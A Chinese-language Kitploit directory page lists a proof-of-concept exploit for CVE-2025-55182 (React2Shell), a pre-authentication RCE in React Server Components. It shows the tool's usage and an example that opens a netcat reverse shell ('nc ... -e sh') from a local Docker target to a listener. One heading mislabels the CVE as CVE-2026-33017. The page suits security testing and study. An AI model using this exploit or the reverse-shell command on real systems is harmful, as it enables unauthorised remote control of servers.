Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2025-55182 — CVE-2025-55182 (React2Shell) PoC:未认证的远程代码执行(RCE),影响 React 19.x 和 Next.js < 15.1.4。利用 RSC Flight 协议中的漏洞。 | Kitploit
工具/GitHubGitHub/masterwok/poc-cve-2025-55182
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubmasterwok/poc-cve-2025-55182

PoC-CVE-2025-55182

CVE-2025-55182 (React2Shell) PoC:未认证的远程代码执行(RCE),影响 React 19.x 和 Next.js < 15.1.4。利用 RSC Flight 协议中的漏洞。

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PoC:CVE-2026-33017

React Server Components 版本 19.0.0、19.1.0、19.1.1 和 19.2.0 存在一个预认证远程代码执行漏洞,涉及以下软件包:react-server-dom-parcel、react-server-dom-turbopack 和 react-server-dom-webpack。存在漏洞的代码会不安全地反序列化发送至 Server Function 端点的 HTTP 请求中的载荷。

https://nvd.nist.gov/vuln/detail/CVE-2025-55182


用法

root@kitploit:~
usage: CVE-2025-55182.py [-h] --command COMMAND target

PoC exploit: CVE-2025-55182

positional arguments:
  target             Target hostname

options:
  -h, --help         show this help message and exit
  --command COMMAND  Command to run on target

示例

root@kitploit:~
# Create docker instance
docker run -d -p 3000:3000 ihsansencan/react2shell:cve-2025-55182

# Start listener
nc -lnvp 4444

# Launch exploit
python3 CVE-2025-55182.py http://127.0.0.1:3000/ --command "nc 192.168.1.211  4444 -e sh"

# Should receive reverse shell in listener
Listening on 0.0.0.0 4444
Connection received on 172.17.0.2 43911
uname -a
Linux f346806b6f59 6.17.0-20-generic #20~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Mar 19 01:28:37 UTC 2 x86_64 Linux

本项目仅用于教育和研究目的。 作者不对因滥用或使用本代码所造成的任何损害负责。

下载工具